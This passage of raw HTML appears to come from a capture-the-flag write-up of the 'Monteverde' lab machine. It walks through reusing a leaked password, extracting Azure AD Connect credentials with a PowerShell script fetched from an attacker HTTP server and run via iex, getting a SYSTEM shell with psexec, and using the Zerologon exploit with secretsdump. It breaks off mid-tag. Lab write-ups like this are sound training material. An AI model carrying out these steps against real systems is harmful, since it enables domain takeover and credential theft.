url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABvklEQVR42k1SWXbiQAz0VWy84H1pt/Fu7EAgBDL7e7Pc/xw1kiBOPuqpDepSVamNoHqB3//Gtv6Kdn7D+fZHcHn7h/n0Ex39lukFYdrD8kpsBOqBEpZbEHJYdkr/FzDa6Yp2eoVuTxiWL6iHF0G3v6Gsj8j1ExI1Y7Ot6IKWahKR6SqYDpER8R1MrmBE+QA/6eAGDTXrFTZd9MIWYTbCCWqk5SyIsgG64UELDXzGxq8faEStUfdnNMNFCD6wIzsVtlGLKJ9gBzs04xUdudFEcrr+xXT4gafzr5VM7Hs5DJ7SkWXT4Uy0kL0TemGDIOnlu6iORHZCqhaMyzdU3QX1+Loq5Bw3fgXDjzt4USOhZ+UiSBVbG5EUezmnxUznGXE2SY2omm4lWO1KniUrPEIRqvYsau4qyTYpdKiZc2SFTMJDuCfXB8QFDaeFrRlSj+Vkd4XcaNMiLLcUIvtB6sc9YsowTAaxy0Pz6oD94Tt2ZLkdb5+WUssLoC2Psr2EKgfeUS66eZYhbJ+fzTvE/iMWfhUOWbUZwQeMfroJSU7NTKhIAV+IUlY3Sm5hOtDAvdhm1ZlaZDlxPgv4HKSTDPsPg1lAXXpIdW8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="get-azure-xml" title="" src="/static/9cd2b5cd2c2271e76928d01d51c5dd63/50637/get-azure-xml.png" srcset="/static/9cd2b5cd2c2271e76928d01d51c5dd63/dda05/get-azure-xml.png 158w, /static/9cd2b5cd2c2271e76928d01d51c5dd63/679a3/get-azure-xml.png 315w, /static/9cd2b5cd2c2271e76928d01d51c5dd63/50637/get-azure-xml.png 630w, /static/9cd2b5cd2c2271e76928d01d51c5dd63/e1355/get-azure-xml.png 763w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">azure.xml</code> contained a password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2d1a6f444c5e79d05b79569ec16b8c7f/f0157/mhope-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.075949367088604%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABNUlEQVR42n2R646DIBSE+yAVVO4ICr2kTW3VdrPv/0izR9xmk/3RH5MBle/M4E4oA5evyLcZffCQTQ2hDbTRcErCaYnObP7eB6PKOlpd9nVdg/NVHLuaM0jrcbqOOJ+OiDHCOQfvPRSBjfMEt0VdF2DpnTb03Dq0QqJiHJyxTSuwIbryET4OCATr+x7WEkApGK2La3JFiRSt12HWmvLN6lIqNFKjacUfUPgBOl0QvEPnKEkIiMOAlHPxgTznA1JK6NOB0lmC6zJQSIlGEJDSbpVrDk0TLqcLvnLAcj7ie5nxut/xejzwJJ9vN0zThHEcYbpINRmqqgJjq7a67F2ZU8KDi1i6AZNocKdqM9VatdA9Pujuzk2Ltm2pVlsOfdJu/cuqS6go6Z6m7Gnyf1W/Cd4pPgF/AKJty4dJGnKyAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="mhope password" title="" src="/static/2d1a6f444c5e79d05b79569ec16b8c7f/50637/mhope-password.png" srcset="/static/2d1a6f444c5e79d05b79569ec16b8c7f/dda05/mhope-password.png 158w, /static/2d1a6f444c5e79d05b79569ec16b8c7f/679a3/mhope-password.png 315w, /static/2d1a6f444c5e79d05b79569ec16b8c7f/50637/mhope-password.png 630w, /static/2d1a6f444c5e79d05b79569ec16b8c7f/f0157/mhope-password.png 809w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Using the credentials, <code class="language-text">evil-winrm</code> was able to make a connection as <code class="language-text">mhope</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 570px; " > <a class="gatsby-resp-image-link" href="/static/da13de64c5448651c3e6257ee2afec3a/2cee3/evil-winrm-mhope.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.69620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACBElEQVR42mVS2Y7aQBDkU8DYY2N8jo/xfWBYIGwgSFGk/f8PqdQMiZLVPpTaY09XV1V75coJorjBqX5ClE+48oBheeDy/QPH6y+c3z8wnZ44nX+gnW6wgxp+UGIfFESOgFVD+CUsr8RKJDPcdIGbvRmIeESYHZAUB0TZhH3Swwsb5LJGEFVwSBjFFdKkQpLUkLJBzGoI3RwrO5ywDWfYyYV1gU1Y+xGbXYuNq3hJYevVWHstrF2DrX7Ps+UpVoW1KLB2JCxiqwmjaEQUdpDRhDydIKkszM9Iq3ckRKquiNU3yOaOsHiD7J78fsJGZEaRJrFp1fYqM3jVqQVTfcJMoqVdoPIWcTYj5Tkrj8jVCZk6QpaMQA7EhJiI5IwdhdhUqclehBVWGSdkbobGluiDFG1ZI2+u6Oc78cB4eKCb7hhYM5L7UWeI0mJBkAxUWH4m3FKuG7bwGb7L8N19bZr2GvHA557PvXm/dQtjT5NsnAKWKL8qtARXTzJtMUxHknTGsraW5Afam1lnfnupsbgEXTWcnfpKqBuFz22K3CjYOBleQwaS9wgI4VeGyNlVCHlfDw6S0ZC9LKt/hHV/o4LJbEw3aiUplQ3MsGqvJrucS/lLmNcXNOzRuWonuud/lSuP2eh8dDbaQsDcQk7fBQ0cXnwtof3zayhD7AXMPOyMA+HXn1T+BnJjXTeYz3H4AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm shell as mhope" title="" src="/static/da13de64c5448651c3e6257ee2afec3a/2cee3/evil-winrm-mhope.png" srcset="/static/da13de64c5448651c3e6257ee2afec3a/dda05/evil-winrm-mhope.png 158w, /static/da13de64c5448651c3e6257ee2afec3a/679a3/evil-winrm-mhope.png 315w, /static/da13de64c5448651c3e6257ee2afec3a/2cee3/evil-winrm-mhope.png 570w" sizes="(max-width: 570px) 100vw, 570px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">mhope</code> was a member of <code class="language-text">Azure Admins</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 536px; " > <a class="gatsby-resp-image-link" href="/static/d4f0c5af51a110c54662419150453b2f/56468/net-user-mhope.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 79.74683544303798%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACzUlEQVR42m1U2XKbQBDkS1LRwSUkBIgbhABdtnXYsZMHJ1XJY/7/Czo9g+zEVXmYWql2tre7pxcjDdZI/Ar1skbmJcjjDEGyRVIdEbOKzRnt4ZnrA5ZJhyDbaoWsrL6DF1QY2REm9krLKNsL1v0j64pP5gqfrQRjO8HESTDif5eXNdtHpOUR87Dh/kr3pUZOyr4MEzdnZVpGt39Gf3xBztsqspkv17C8AuYsw5QNJn/P/FrL4549L+EsKq6F7k9cgtqxshtbEQyhXawfkLO6wwuidKeSTWkmgxlBys0Fy7hDlO8RUeoqP8BfNdyP36VOVFUKo2geUHcXpPSr7h55YKdyzFmuDS6Z1d0VDhmNrfhdruwJw6HYK/1ka4TpFnGxR5j2g+lJf5OT6iGbkiP2JGS1CDfKfkWm/qr9C8p1bN0kl+0Zu7tvKCm52T7pAPyowdiMldHMX6Pdv9Dfk4IE6SB5EW0UUIYnfYPkfBjK6fEHNpz0/eU7TtdXlM0J86CBNSs4iAZ1K5e0jEijoD79lAFN7FTZTR1hmWsZclA2PXolh0I2yyrD0Wl6JRbBhhGKB0biIaM1gGX/1A1wzRzWlF01ZxT1vYJlzJxFk0c86Mwr9U4A3mr69vsD8A1wy6hsdk/QlR4KkMgw3eFmkxMUH2cMuMgfftdqyZzMHSoYQG+ACdnENLlY3yOIewX8zBcyvRluE7Cip5ueA6PPJZVUzGW7+8JBnuFSwQdAiYSUPi3euqRkAZ4STCQJg4CDkPiIn8JYSgb2Xw/FHy3GYM4PRcgcLqMODg9MTAbcy7nXqgUWAeXpSdhdDkzVTCV/6TA0m2+51qFc0fA1iIe741f0lLNl9rywRUyg3/0Fr/URvzi8n3xZWbLjh4J7Be3KDkpAUiGXGDFTL1OtGdyUDTU9kpKXId6mbOw4/ZhhX5KdL1KtIToaKQK7i+HDITb8AXvYBBEx6EbGAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="net user mhope" title="" src="/static/d4f0c5af51a110c54662419150453b2f/56468/net-user-mhope.png" srcset="/static/d4f0c5af51a110c54662419150453b2f/dda05/net-user-mhope.png 158w, /static/d4f0c5af51a110c54662419150453b2f/679a3/net-user-mhope.png 315w, /static/d4f0c5af51a110c54662419150453b2f/56468/net-user-mhope.png 536w" sizes="(max-width: 536px) 100vw, 536px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Viewing the directories in <code class="language-text">C:\Program Files</code> showed that MSSQL and Azure AD Connect were on the system:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f957aaaed2a26edf59696bbe8156074b/7842b/azure-directories.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.0253164556962%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACFElEQVR42pWSV3LbQBBEeRSTNJGIQIRFDksEkpAoybJU9v1P0u5dgKVy+csfU4PCzrzpCRvbzuC5FXy/gBvWCEQPP5E4hi0Obo69k/2XbfYEulEHJ2phB7UGKX845tjZqQ5SXn/Tvitzlu/9+v4XMCkmHBwqsVLtT+kAUV0RZoNOUPAonxDmIxUXOumbJbA1E+yUWQm2tJ0tFmDMYNMrCRRIqxu64QeS4opavugCyhy/xjS8oatvaMoLQr+ES4BjRDD2Acy9D3Pn8tsjMBthrcCifdbAkCoV0DgWVCIQEDqPBDYzxvOL9gO9bGdUOWNpYVBBsIhueQGmKLs75PgTcTYReIdBkAKGnOf9+gHJIpfpHX3/ipIQEUukXGKWjhDMyd0Sm+ihkIlF84SWrYWCVTsqtLkYM8WRgbf+DQOL9FRX8l2cOgTHEtYhgW0ki1ctC6XQXYAlgXJ8hxpDLV+pkEsg0OBZjU+/UfKfqGZeQMVlqCvgSFh0qzw73FrROkN3bbm9o6WSKF0VaqCASSX99KHn2xCasL1TPPBuJbz4jCAZYHNxu0PAGeZKYcH7ytARJpkkuOVGLi0/gJf5F4brJ/J6RpJfEBBoeQ2V8v5UnI6NlcIVyAelTkFVggaqY30ovHzqMWRsOS1uPKWGXeWL2V+2Ue0twFTPsOamIzGirJ+p8As4EHjmBcjhXS/N8mrm5P9A/wDHZIQG98iVQQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="azure directories" title="" src="/static/f957aaaed2a26edf59696bbe8156074b/50637/azure-directories.png" srcset="/static/f957aaaed2a26edf59696bbe8156074b/dda05/azure-directories.png 158w, /static/f957aaaed2a26edf59696bbe8156074b/679a3/azure-directories.png 315w, /static/f957aaaed2a26edf59696bbe8156074b/50637/azure-directories.png 630w, /static/f957aaaed2a26edf59696bbe8156074b/7842b/azure-directories.png 800w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Azure AD Connect is a tool that provides users with a common hybrid identity for on-premise (Windows Server Active Directory) and cloud (Azure, Office365) infrastructure. One of the features provided is Password Hash Synchronization (PHS) which syncs password hashes between on-premise AD and Azure AD.</p> <p>One of the toolkits that could be used to exploit Azure AD Connect is <a href="https://github.com/dirkjanm/adconnectdump" target="_blank">adconnectdump</a> which is able to extract and decrypt credentials stored in the ADSync database. Similar to ADSyncDecrypt within adconnectdump, there's another tool written in PowerShell featured on <a href="https://blog.xpnsec.com/azuread-connect-for-redteam/" target="_blank">this blog post</a> that can also be used to reveal credentials.</p> <p>In order for the PowerShell script to establish a successful connection to the MSSQL server, I needed to modify the connection string since the target machine was running a dedicated MSSQL instance.</p> <p>The syntax for a trusted connection SQL can be found <a href="https://www.connectionstrings.com/sql-server/" target="_blank">here</a>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 613px; " > <a class="gatsby-resp-image-link" href="/static/1fafdc1ff0e2822d20a0ef7adc24b5da/542a9/sql-connection-string.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.78481012658228%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAAy0lEQVR42qWP3WqEMBBGff/na2FbFqrGmBgTY+KumrX2NLX/F73qwOE7AzMMU0xpZ0rPXHLGdWfedv5Txb0InGTgIXNXe84qMi+JyyVxvb6xZF9Y5o/+MzPzvLCuiZRuXxRGezrVo1uDVgbZaGTbU1UWUffUlaIsFVL2NI2jFvZASIfKe9Z5YoyEEBkzxbbdsJ3AGsnoTU7BYFui7w73TjMOGpdnwtDlXuHMu+vmTFOeMO0Tbf14eMHL9/8/9Jf/VVNweKuPDL7PRwyvn4V/0D/I7VQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sql connection string" title="" src="/static/1fafdc1ff0e2822d20a0ef7adc24b5da/542a9/sql-connection-string.png" srcset="/static/1fafdc1ff0e2822d20a0ef7adc24b5da/dda05/sql-connection-string.png 158w, /static/1fafdc1ff0e2822d20a0ef7adc24b5da/679a3/sql-connection-string.png 315w, /static/1fafdc1ff0e2822d20a0ef7adc24b5da/542a9/sql-connection-string.png 613w" sizes="(max-width: 613px) 100vw, 613px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>In this case, the server was <code class="language-text">MONTEVERDE</code> and the database was <code class="language-text">ADSync</code>, so I changed the connection string to be the following:</p> <div class="gatsby-highlight" data-language="powershell"><pre class="language-powershell"><code class="language-powershell"><span class="token variable">$client</span> = <span class="token function">new-object</span> System<span class="token punctuation">.</span><span class="token keyword">Data</span><span class="token punctuation">.</span>SqlClient<span class="token punctuation">.</span>SqlConnection <span class="token operator">-</span>ArgumentList <span class="token string">"Server=MONTEVERDE;Database=ADSync;Trusted_Connection=true"</span></code></pre></div> <p>Next, I started a python HTTP server containing the PowerShell script (<code class="language-text">azure-ad-decrypt.ps1</code>):</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; " > <a class="gatsby-resp-image-link" href="/static/e1e2470d6925f56048befdb0cac780ad/bc282/http-server.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.11392405063291%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABKklEQVR42lVQ2W7CMBDMt4QjJTgJJLbjXCVXcSAUtRxVD/X/P2O6tkAVD6M9vJ6dWWfCJNx4gCsvcMUZ7roHEzXa4YJan9EMZ+jXL3S7K6r+jXon+1a2RwvT86ICk4XA1JdwonLEKh8R8g3W2RartEckO7CkxjzILaZLZaMXFhYzlj3UUz+1ZJaQJc/weYcF1/DlHkvxglC24IVGwGusiDzJzaIOoWhsbXKzMOCN7ZmFkzuhGzeYFVfMqx945Sc8OUA1I4bjNw6nX2vZWN9s35HVBxQ3m9lmhCKY+mldkWVpSZ129wFe7cFLjTjrEasOohhIlaaoEYnWKoozUn5TxBI6j+oRkMr0mf7SrDnBjCk4Mu/gzmNiT2kLwVdwTX6DsWNudo/3/BH/8388xcWWWCZNgQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="http server" title="" src="/static/e1e2470d6925f56048befdb0cac780ad/bc282/http-server.png" srcset="/static/e1e2470d6925f56048befdb0cac780ad/dda05/http-server.png 158w, /static/e1e2470d6925f56048befdb0cac780ad/679a3/http-server.png 315w, /static/e1e2470d6925f56048befdb0cac780ad/bc282/http-server.png 512w" sizes="(max-width: 512px) 100vw, 512px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I used <code class="language-text">iex</code> to execute it on the target machine which revealed the password for the <code class="language-text">administrator</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cab688c28c30ffa81fd5ea9cce277770/a14f6/administrator-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 13.29113924050633%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAlklEQVR42k3OXQ6CMBAEYK4iyF+iUKXFgtLSFjQkJhifvP9FxgWJ6cOXyWY2mw10ZaAbg6t6QtsZdftAce5XJzEQhwPTYNytymrJAUyMYPWAkvpjZVEsuEXQuTfG6QNlX+uxKOHYJQKhJ0r9uabek5JsS9oL2rKDano0twnKzPSRgZB3cBLGHHEusc8uP/mWmfyLfLnEFyCTX9sgAclRAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="administrator password" title="" src="/static/cab688c28c30ffa81fd5ea9cce277770/50637/administrator-password.png" srcset="/static/cab688c28c30ffa81fd5ea9cce277770/dda05/administrator-password.png 158w, /static/cab688c28c30ffa81fd5ea9cce277770/679a3/administrator-password.png 315w, /static/cab688c28c30ffa81fd5ea9cce277770/50637/administrator-password.png 630w, /static/cab688c28c30ffa81fd5ea9cce277770/a14f6/administrator-password.png 797w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I ran <code class="language-text">psexec.py</code> with the admin credentials to obtain a system shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ef0e8b686201df9418e15c3f9a058b87/75a23/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.15189873417721%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACUElEQVR42nWT6XKbQBCEeRRbIAkQ9yFxI5CQrMtX7LKrUpX3f4tOz2I7SsX50TXA7n709IDmFkc4zSvs4glZ/4Dh/Ib95R2n5184PP7EcHrDqj5g6uSww2ZUUMOiFlGjqv1xLXu0KBsQZRuYXsGFCqZfqU1S7WgEOFHL+1IdcuI1azs+l2vW8XmLmVNAy9oT2uEJaXmnNL5gQNnfw+Umi2DdSjExE9zOo1GzmPVDZvqlibUksD5ic/eCfvcDw+GVesGW9/vTO9JiDy/uYBNq2CslnYd0wnXCdMInsxATVvWc65rk0++esd4+o2aGHcHt5hFJvkfV3SuowwgMcTEjYC6wT8Uj0PBYAwIzaHlzQsG25bAob46o1mdVZa3hSzzJjC5Nr6S70eFEwT40H+91vlTzkx5LuohWW8SUqsstbK/CnCEvZIp+rarpZOPBecrD0n42ys5HsOFDi7OdcrTiQMr2gjSTFjmxRa6AInW9yDC1mKNJgJn/gVn56JCtqwy9aI1EnKUbhHQWxD3CZEO3g5IXdXDDFtLJwqvpjs7M7G+gZMt2VYbirO4udHdGub6gkEw5+aZ/hM8J3xj8XKbcPF/S3afD74Cxal1zgwZBIi4auugQpr0ChSnd0qnDdcfnX6BgV8BrKAd1O/XVsLRUPg9mKC0nq51qP2Gr8lwG4zLPBYHGFfBflxwWoZNpAK1gqz3/lITDaboH1a64EtCNEcNlxpKlrfJb/t8lW5d7TZ/xA53xt5kmKvS8OtJRpSYtbS+LO+T1CQE7sNzye+gV+DfLusC2ia4fgwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/ef0e8b686201df9418e15c3f9a058b87/50637/system-shell.png" srcset="/static/ef0e8b686201df9418e15c3f9a058b87/dda05/system-shell.png 158w, /static/ef0e8b686201df9418e15c3f9a058b87/679a3/system-shell.png 315w, /static/ef0e8b686201df9418e15c3f9a058b87/50637/system-shell.png 630w, /static/ef0e8b686201df9418e15c3f9a058b87/75a23/system-shell.png 718w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Since this box was released in January of 2020, it was before the initial Microsoft patch for <a href="https://nvd.nist.gov/vuln/detail/cve-2020-1472" target="_blank">Zerologon (CVE-2020-1472)</a> which was in August of 2020, thus, there's another method to obtain administrative privileges on the machine within a few steps.</p> <p><code class="language-text">crackmapexec</code> has a module that can check if a target is vulnerable to Zerologon:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f073a2d9fd0b0e2407c9d3130f5c9a7f/c4923/crackmapexec-zerologon.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 18.354430379746837%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6ElEQVR42iXP226CUBBAUX5FMdYLyO0cKHcPFrEVpBrTNPYP+v/vuyN9WJl5mZ2MZUdnbH1jHhzxdU196ClMT/N+JzUDxWHEUXvm6/jfSjMTz32xSbDFYhLLrrG8dMDNeiJzpXy70rSflM1ALtG4PtOND9r+m51El35DUFxIqg/81xZXNTj6wDYyYj+xNpdfthKsJGC6O/m+R2ctKjui8hOn8Uc8pqMkKfnqam5tRZpWuF5CGCZ4/lNMEMZYujyidY5SOWuv4sXNseWlpZtNdsrghDUzeXHtKHwvEgpP+BKJAj0JnzNU/AFVR4TWpLbhTwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crackmapexec zerologon" title="" src="/static/f073a2d9fd0b0e2407c9d3130f5c9a7f/50637/crackmapexec-zerologon.png" srcset="/static/f073a2d9fd0b0e2407c9d3130f5c9a7f/dda05/crackmapexec-zerologon.png 158w, /static/f073a2d9fd0b0e2407c9d3130f5c9a7f/679a3/crackmapexec-zerologon.png 315w, /static/f073a2d9fd0b0e2407c9d3130f5c9a7f/50637/crackmapexec-zerologon.png 630w, /static/f073a2d9fd0b0e2407c9d3130f5c9a7f/c4923/crackmapexec-zerologon.png 734w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I cloned <a href="https://github.com/dirkjanm/CVE-2020-1472" target="_blank">this PoC</a> and ran <code class="language-text">cve-2020-1472-exploit.py</code> which changed the password for the DC machine account to an empty string:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 519px; " > <a class="gatsby-resp-image-link" href="/static/45cbcc99de537ed146c28bbb705e4895/572de/cve-2020-1472-exploit.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABb0lEQVR42jVQ23KCQBTzVypUBeUq7KK7rtwR8NbqaOtMpy/9/19ID2v7kEkmTHKyjMwFgxG2GEdnmPE7ZlEFnnbozl9ojg+0pwcO12/U+w8U3Q078gZd9jdU/R1p8w6mWrwuVjDnCUYOr+HJN7jiAIc3UFTW9Bd0hzvK9qoLL58/mrfVG2Rx0hD5EWzTgqsOy3UDN8qehTI/oaDgEM7pWtZcoLI9NlQsCSLtscoOFN4h4AUWyxROnMHVyOGxHD75Pi8RrmqMmNhBDAHZEh+haMWgE0lryyPEtoPPMgoW8KggEg0tquFEqS4IklIXL1cVpq7AKGAl/LjEPNjC9jeYuVL/j4mzhuUmsDxBvIYdKFi+hEMLBz18t0NFeoMJFc3J00/2ooLen1OZwtQRMO0EhsUxthheJiHG0yXGM0aIn94fGzbX+oW09v88WlghTGoswi0S1SNe72iV1KUmwZhF+shw3ZhzzSbxEP7XptZP7xfsDulxnv9xcQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="cve-2020-1472-exploit" title="" src="/static/45cbcc99de537ed146c28bbb705e4895/572de/cve-2020-1472-exploit.png" srcset="/static/45cbcc99de537ed146c28bbb705e4895/dda05/cve-2020-1472-exploit.png 158w, /static/45cbcc99de537ed146c28bbb705e4895/679a3/cve-2020-1472-exploit.png 315w, /static/45cbcc99de537ed146c28bbb705e4895/572de/cve-2020-1472-exploit.png 519w" sizes="(max-width: 519px) 100vw, 519px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Now that <code class="language-text">MONTEVERDE$</code> had a blank password, I could authenticate as the DC machine account to reveal domain NTLM hashes with <code class="language-text">secretsdump.py</code>. Notice that <code class="language-text">MONTEVERDE$</code> had an NT hash value of <code class="language-text">31d6cfe0d16ae931b73c59d7e0c089c0</code> which is the MD5 hash of a blank password within the context of NTLM:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b1399ae018d753f673cab6faab2d7e8d/d9f0b/secretsdump-no-pass.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 40.50632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABnElEQVR42lWS53LbMBCE9SqZ2LQsl1iFIiGKDQQJgE2Fqvb7P8dmQSeZyY+dK8R8OC5uMvVLeOIIL9zhLSwhih4btYOQPYK8wyq2+AgU/EgzFqNe5jGe3gWm7xs8vQk8zNb/NHEHgm2FVURtDWWx2FSjXL2Oa/iMQVpjyd7LIsVsnuD5Y8s8oeL/gfU6wz7W6DYSJ9lgkC0OWYNj3uJUdNhnNdWg3WqYsEAVSBhK+SlyTjmf+fhB0ONfYKGOUOYEVTGWO1T6ANtcoOszDGNpBuYXNN0dFc+5Xt3dYNsrItrhC4Xprwg/n/1vYNncULV3pNWApDwgpocp4bk9QxIq/0RXZ4Sn+jjWhbusu0ITXtgBK9rhvYaYKHuBqq9I1QEi7ZA4IMGZHiA5UU6Ig2ZO7MXlnsALUvZz676dRmAsOz6SoIf9F+zuC4XhrYRLd5Ag3X9Sd05wh6Fa5oaT2cZZcR7rtr9Bc1K7/4RI7PjbE5E043TbnGsSGSxCvrAoxxddCuZcl4CboFcp9DqnMpTL79xQS/rncX2812D08DfrQRpSvAZ6sQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="secretsdump no password" title="" src="/static/b1399ae018d753f673cab6faab2d7e8d/50637/secretsdump-no-pass.png" srcset="/static/b1399ae018d753f673cab6faab2d7e8d/dda05/secretsdump-no-pass.png 158w, /static/b1399ae018d753f673cab6faab2d7e8d/679a3/secretsdump-no-pass.png 315w, /static/b1399ae018d753f673cab6faab2d7e8d/50637/secretsdump-no-pass.png 630w, /static/b1399ae018d753f673cab6faab2d7e8d/d9f0b/secretsdump-no-pass.png 824w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I used <code class="language-text">psexec.py</code> with the <code 